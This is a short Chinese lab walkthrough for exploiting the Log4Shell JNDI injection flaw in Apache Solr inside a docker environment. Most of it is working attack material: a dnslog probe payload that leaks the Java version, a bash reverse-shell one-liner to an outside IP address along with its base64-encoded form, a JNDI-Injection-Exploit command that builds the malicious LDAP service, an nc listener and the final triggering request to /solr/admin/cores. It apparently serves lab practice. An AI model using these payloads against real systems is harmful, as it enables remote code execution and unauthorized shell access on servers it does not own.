1.环境搭建
docker-compose up -d
2.检查端口并访问
3.用dnslog平台检测dns回显,看看有没有漏洞存在
获取子域名,我是 1ilobr.dnslog.cn
4. 可以发现 /solr/admin/cores?action= 这⾥有个参数可以传
构造⼀个请求传过去存在JNDI注⼊那么ldap服务端会执⾏我们传上去的payload然后在DNSLOG 平台上那⾥留下记录,我们可以看到留下了访问记录并且前⾯的参数被执⾏后给我们回显了java的 版本号!
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.1ilobr.dnslog.cn}
5.反弹shell
bash -i >& /dev/tcp/1.92.134.1/8848 0>&1
base64编码后
YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzg4NDggMD4mMQ==
命令
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjkyLjEzNC4xLzg4NDggMD4mMQ==}|{base64,-d}|bash" -A 1.92.134.1
6.监听自己的端口nc -lvvp 8848
访问缓存/solr/admin/cores?action=${jndi:ldap://1.92.134.1:1389/tybxdg}